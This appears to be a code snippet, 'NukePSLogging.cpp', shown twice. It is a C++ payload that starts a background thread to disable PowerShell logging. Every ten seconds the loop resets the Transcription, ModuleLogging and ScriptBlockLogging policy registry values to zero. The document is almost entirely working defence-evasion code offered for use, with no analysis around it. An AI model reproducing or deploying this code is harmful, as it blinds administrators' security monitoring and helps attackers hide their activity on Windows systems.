leechristensen · March 17, 2017 09:20
diff --git a/NukePSLogging.cpp b/NukePSLogging.cpp
 void Payload() {
 	DWORD threadId;
 	CreateThread(
 		NULL,                   // default security attributes
 		0,                      // use default stack size  
 		MyThreadFunction,       // thread function name
 		NULL,          // argument to thread function 
 		0,                      // use default creation flags 
 		&threadId);
 }

 DWORD WINAPI MyThreadFunction(LPVOID lpParam) {
 	HKEY hKey;
 	LPCSTR sKeyPath;
 	int iResult;
 	DWORD value = 0x00000000;

 	while (TRUE) {
 		sKeyPath = "SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription";
 		iResult = RegOpenKeyEx(HKEY_LOCAL_MACHINE, sKeyPath, NULL, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hKey);
 		if (iResult == ERROR_SUCCESS) {
 			if (ERROR_SUCCESS != RegSetValueEx(hKey,
 				TEXT("EnableTranscripting"),
 				NULL,
 				REG_DWORD,
 				(const BYTE*)&value, // Change made here.
 				sizeof(value))) {
 				OutputDebugString("Failed to add key");
 			}
 		}
 		else {
 			printf("Could not open key: %d", iResult);
 		}



 		sKeyPath = "SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging";
 		iResult = RegOpenKeyEx(HKEY_LOCAL_MACHINE, sKeyPath, NULL, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hKey);
 		if (iResult == ERROR_SUCCESS) {
 			if (ERROR_SUCCESS != RegSetValueEx(hKey,
 				TEXT("EnableModuleLogging"),
 				NULL,
 				REG_DWORD,
 				(const BYTE*)&value, // Change made here.
 				sizeof(value))) {
 				OutputDebugString("Failed to add key");
 			}
 		}
 		else {
 			printf("Could not open key: %d", iResult);
 		}

 		sKeyPath = "SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging";
 		iResult = RegOpenKeyEx(HKEY_LOCAL_MACHINE, sKeyPath, NULL, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hKey);
 		if (iResult == ERROR_SUCCESS) {
 			if (ERROR_SUCCESS != RegSetValueEx(hKey,
 				TEXT("EnableScriptBlockLogging"),
 				NULL,
 				REG_DWORD,
 				(const BYTE*)&value, // Change made here.
 				sizeof(value))) {
 				OutputDebugString("Failed to add key");
 			}
 		}
 		else {
 			printf("Could not open key: %d", iResult);
 		}

 		Sleep(10000);
 	}
 }
	void Payload() {
	DWORD threadId;
	CreateThread(
	NULL, // default security attributes
	0, // use default stack size
	MyThreadFunction, // thread function name
	NULL, // argument to thread function
	0, // use default creation flags
	&threadId);
	}

	DWORD WINAPI MyThreadFunction(LPVOID lpParam) {
	HKEY hKey;
	LPCSTR sKeyPath;
	int iResult;
	DWORD value = 0x00000000;

	while (TRUE) {
	sKeyPath = "SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription";
	iResult = RegOpenKeyEx(HKEY_LOCAL_MACHINE, sKeyPath, NULL, KEY_ALL_ACCESS \| KEY_WOW64_64KEY, &hKey);
	if (iResult == ERROR_SUCCESS) {
	if (ERROR_SUCCESS != RegSetValueEx(hKey,
	TEXT("EnableTranscripting"),
	NULL,
	REG_DWORD,
	(const BYTE*)&value, // Change made here.
	sizeof(value))) {
	OutputDebugString("Failed to add key");
	}
	}
	else {
	printf("Could not open key: %d", iResult);
	}



	sKeyPath = "SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging";
	iResult = RegOpenKeyEx(HKEY_LOCAL_MACHINE, sKeyPath, NULL, KEY_ALL_ACCESS \| KEY_WOW64_64KEY, &hKey);
	if (iResult == ERROR_SUCCESS) {
	if (ERROR_SUCCESS != RegSetValueEx(hKey,
	TEXT("EnableModuleLogging"),
	NULL,
	REG_DWORD,
	(const BYTE*)&value, // Change made here.
	sizeof(value))) {
	OutputDebugString("Failed to add key");
	}
	}
	else {
	printf("Could not open key: %d", iResult);
	}

	sKeyPath = "SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging";
	iResult = RegOpenKeyEx(HKEY_LOCAL_MACHINE, sKeyPath, NULL, KEY_ALL_ACCESS \| KEY_WOW64_64KEY, &hKey);
	if (iResult == ERROR_SUCCESS) {
	if (ERROR_SUCCESS != RegSetValueEx(hKey,
	TEXT("EnableScriptBlockLogging"),
	NULL,
	REG_DWORD,
	(const BYTE*)&value, // Change made here.
	sizeof(value))) {
	OutputDebugString("Failed to add key");
	}
	}
	else {
	printf("Could not open key: %d", iResult);
	}

	Sleep(10000);
	}
	}